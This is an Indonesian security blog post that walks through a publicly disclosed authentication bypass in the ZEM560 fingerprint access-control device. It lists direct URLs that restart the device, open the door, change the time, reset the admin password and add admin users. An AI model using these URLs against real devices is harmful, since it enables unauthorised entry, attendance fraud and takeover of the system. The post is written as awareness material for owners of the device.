Open Source

Untuk seluruh software yang bersifat Open Source tidak akan tenggelam oleh waktu dikarenakan banyak yang mendukung program tersebut dan software tersebut tidak kalah bersaing dengan software berbayar lainnya.

Certified

Mengambil sertifikasi semata-mata bukan untuk menjadi tenar atau sombong, tapi untuk mengetahui apakah anda mampu mengemban tanggung jawab secara moral terhadap apa yang anda telah pelajari dan bagaimana memberikan ilmu tersebut kepada orang lain tanpa pamrih.

Operating System Pentest

Sistem operasi Bactrack, Kali Linux, dll memang sangat memanjakan para Pentester dalam melaksanakan tugasnya sesuai dengan prosedur yang berlaku. Di OS tersebut disediakan beberapa tools menarik seperti untuk memperoleh information gathering, vulnerability assesment, exploit, dll.

Sherlock Holmes

Film detektif yang satu ini pasti disukai oleh beberapa rekan IT dikarenakan proses jalan ceritanya ketika memecahkan sebuah kasus tidak monoton dan memerlukan logika berpikir yang diluar kebiasaan. Daya hayal harus tinggi ketika ingin menonton film ini.

Forensic

Kegiatan forensic bidang IT sangat membutuhkan tingkat pemahaman yang tinggi akan suatu kasus yang ditangani. Tim yang menangani forensic harus bisa membaca jalan pikiran si Attacker seperti apa jika melakukan serangan. Biasanya Attacker lebih maju selangkah dibanding dengan tim pemburunya.

Kamis, 07 Agustus 2014

Vulnerability & Exploit Fingerprint ZEM560

Sebelumnya mau mengucapkan Mohon Maaf Lahir dan Batin terlebih dahulu. Pada postingan ini saya akan membahas tentang kelemahan dan cara mengeksploitasi mesin absensi berupa fingerprint. Sebenarnya Bug ini sudah terpublish sejak tahun 2012 jika saya tidak salah. Bug ini akan dapat digunakan pada model mesin ZEM560. Control Panel mesin ini berbasiskan website dan tentunya dapat diakses oleh seseorang yang dapat menggunakan jaringan internal si kantor tersebut asalkan tidak di private oleh switch/router kantor tersebut. Berikut ini adalah tampilan interface dari halaman admin mesin fingerprint ZEM560.

[+] Device: Fingerprint & Proximity Access Control
[+] Model: ZEM560 and others
[+] Kernel: 2.6.24 Treckle on an MIPS
[+] Vulnerability: Auth Bypass
[+] Impact: By using a direct URL attackers can bypass the fingerprint
& proximity security and open the door. Attackers may change the
device configuration, create admin users, access to reports, etc.


Source: http://seclists.org/fulldisclosure/2012/Apr/37

Oke langkah awalnya adalah anda bisa melakukan scanning terlebih dahulu pada jaringan kantor anda dengan menggunakan Nmap atau tools lainnya. Jika sudah didapatkan ip targetnya maka siap beraksi. Kelemahan pada sistem fingerprint tersebut adalah interface webnya dapat dilakukan bypass melalui direct url. Seharusnya dilakukan pembatasan untuk menghindari adanya direct url ke menu tertentu. Seperti keterangan diatas telah dijelaskan dampak dari bug ini bahwa Attacker dapat mengeksploitasi dengan menambahkan akun admin, pengambil alihan password admin dan manipulasi lainnya. Alhamdulillah ketika menguji Bug ini, saya tidak melakukan keuntungan untuk diri sendiri atau orang lain karena masih takut akan dosa dari Yang Maha Kuasa, Hahaahaaa berat bener bahasanya.

Oke sebagai langkah awal untuk memastikan apakah bug tersebut dapat bekerja dengan baik, maka cobakan perintah dibawah ini dan saya asumsikan ip address target 192.168.1.1:

Perintah 1:
http://192.168.1.1/form/Device?act='or1=1--

Output 1:
Devcie restarting, please connect later!

Review 1:
Pada url dengan perintah act kita input beberapa karakter yang biasa digunakan untuk melakukan blind sql injection dan hasil yang didapatkan adalah mesin fingerprint tersebut secara otomatis akan restart. Oh ya jika diperhatikan dengan baik, maka pada penulisan output yang ada di sistem tersebut salah menuliskan kata "Device" tuh. Mungkin programmernya lagi dikejar deadline atau ngantuk saat buat kata-kata tersebut.

Perintah 2:
http://192.168.1.1/form/Device?act=9

Output 2:





Review 2:
Perintah dengan id 9 adalah untuk melakukan testing sederhana saja dan hasil yang akan didapatkan berupa text dengan berisikan Open Door. Testing ini tidak ekstrim seperti testing nomor 1 yang langsung melakukan restart terhadap perangkat tersebut.

Perintah 3:
http://192.168.1.1/form/Device?act=3

Output 3:













Review 3:
Perintah ini untuk melakukan pengaturan waktu pada mesin finger tersebut. Biasanya settingan default mesin ini adalah dengan menggunakan Adjust Mode Auto. Jika Attacker tidak ingin telat absensinya maka dapat menggunakan perintah ini tapi nanti tetap ada celah untuk investigasinya, karena bangkai pasti lama kelamaan akan tercium baunya.

Perintah 4:
http://192.168.1.1/form/Device?act=5

Output 4:








Review 4:
Perintah ini berfungsi untuk melakukan pengaturan pada TCP/IP si mesin tersebut. Nah apabila si Attacker mendapatkan informasi tersebut lebih lanjut, mungkin dapat eksploitasi lebih lanjut seperti membuat fake interface yang palsu / phissing dan selanjutnya terserah si attacker mau ngapain.

Perintah 5:
http://192.168.1.1/form/Device?act=7

Output 5:

Review 5:
Menurut saya ini risiko bersifat major, hal ini disebabkan password admin dapat diambil alih dengan mudahnya tanpa harus memasukkan password yang sebelumnya. Alangkah lebih baik apabila jika ingin mengganti password baru ditambahkan field yang berfungsi untuk memasukkan password yang lama atau sebelumnya.

Perintah 6:
http://192.168.1.1/csl/user

Output 6:
















Review 6:
Menu ini berfungsi untuk menampilan seluruh user yang terdaftar pada mesin tersebut. Disini Attacker dapat menggunakan menu option untuk melakukan modifikasi terhadap akun user tertentu.

Perintah 7:
http://192.168.1.1/csl/user?action=add

Output 7:













Review 7:
Menu ini berfungsi untuk melakukan penambahan akun untuk sistem fingerprint. Attacker dapat membuatkan hak akses berupa user, enroll, admin, superadmin, dll.


Segitu saja beberapa informasi yang dapat saya contohkan dan semoga tidak digunakan untuk yang tidak baik. Saya semata-mata hanya memberikan pengetahuan terhadap pengguna mesin ini agar lebih berhati-hati dan melakukan pencegahan agar tidak dieksploitasi sistem finger yang digunakan.